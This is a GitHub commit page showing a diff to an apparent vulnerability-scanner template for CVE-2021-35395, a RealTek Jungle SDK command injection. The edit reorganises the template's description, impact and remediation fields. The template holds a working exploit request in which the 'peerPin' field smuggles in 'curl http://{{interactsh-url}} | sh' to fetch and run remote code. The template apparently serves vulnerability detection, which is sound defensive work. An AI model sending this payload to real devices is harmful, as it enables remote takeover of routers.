Skip to content

Commit

Permalink
Update CVE-2021-35395.yaml
Browse files Browse the repository at this point in the history
  • Loading branch information
ritikchaddha authored Nov 10, 2023
1 parent 4786908 commit ed66572
Showing 1 changed file with 6 additions and 6 deletions.
12 changes: 6 additions & 6 deletions http/cves/2021/CVE-2021-35395.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -4,14 +4,14 @@ info:
name: RealTek Jungle SDK - Arbitrary Command Injection
author: king-alexander
severity: critical
description: There is a command injection vulnerability on the "formWsc" page of the management interface.
impact: |
Successful exploitation of this vulnerability could lead to remote code execution and compromise of the affected system.
remediation: |
Apply the latest security patches or updates provided by RealTek to fix the vulnerability.
remediation: Apply the latest security patches or updates provided by RealTek to fix the vulnerability.
description: |
There is a command injection vulnerability on the "formWsc" page of the management interface. Successful exploitation of this vulnerability could lead to remote code execution and compromise of the affected system.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-35395
- https://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities
metadata:
max-request: 1
tags: cve,cve2021,realtek,rce,kev

http:
Expand All @@ -20,7 +20,7 @@ http:
POST /goform/formWsc HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
# The 'peerPin' parameter is unsanitized. So we can inject arbitrary commands after the statement that uses the 'peerPin' value.
submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=
matchers-condition: and
Expand Down

0 comments on commit ed66572

Please sign in to comment.